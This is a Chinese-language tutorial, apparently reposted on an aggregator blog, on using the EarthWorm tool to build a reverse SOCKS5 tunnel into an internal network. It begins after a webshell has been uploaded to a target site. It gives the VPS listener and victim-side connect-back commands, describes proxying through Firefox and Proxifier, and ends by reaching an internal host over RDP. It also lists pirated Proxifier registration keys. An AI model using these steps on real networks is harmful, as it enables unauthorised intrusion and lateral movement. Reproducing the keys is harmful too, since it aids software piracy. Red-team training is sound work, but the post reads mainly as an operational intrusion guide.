EW之Socks5反向代理内网穿透

Posted Pggcute

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了EW之Socks5反向代理内网穿透相关的知识,希望对你有一定的参考价值。

EW(earthworm)功能介绍

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。

准备阶段

在靶机网站上传一句话马使用蚁剑连接

ipconfig /all

一台外网vps:110.42.229.X
一台内网靶机:192.168.1.5(3389开放)

内网机器(无公网ip需要反弹到公网,需要在vps监听
vps服务端执行:

./ew_for_linux64 -s rcsocks -l 6666 -e 6667

这条命令的意思是说让公网服务器监听6666和6667端口,等待攻击者机器访问6666端口,目标机器访问6667端口。
如果机器报错:

Error: bind port xxxx

则可能是因为该端口被进程占用,查询占用进程,杀掉该进程,重新执行命令即可。

lsof -i:xxxx

内网机器执行:

ew_for_Win.exe -s rssocks -d vps的ip -e 6667

使用方式:sock5代理访问的6666端口

火狐添加代理


访问192.168.1.5


可以访问内网,实现内网穿透

使用proxifier代理

Proxifier Standard 版本注册码:
QBZ9F-D3VWW-BQ7YC-XUKWY-RB95P
D6ZMK-HY6A3-LYR3S-8U8KA-YEE6E
AVZCR-B2SKY-FEYW3-8AR76-2R5ZG
C8ZXW-D2TW8-QL7WV-U3PH7-38L4H

vps的IP和刚刚的6666端口

添加规则
localhost改为direct

添加程序与路由–browse 选择mstsc.exe


即可


拿下内网主机

以上是关于EW之Socks5反向代理内网穿透的主要内容,如果未能解决你的问题,请参考以下文章

EW之Socks5反向代理内网穿透

红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)

红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)

ew通过socks5一层代理-访问内网二层网络-实战篇

ew通过socks5一层代理-访问内网二层网络-实战篇

内网穿透-EW贯穿内网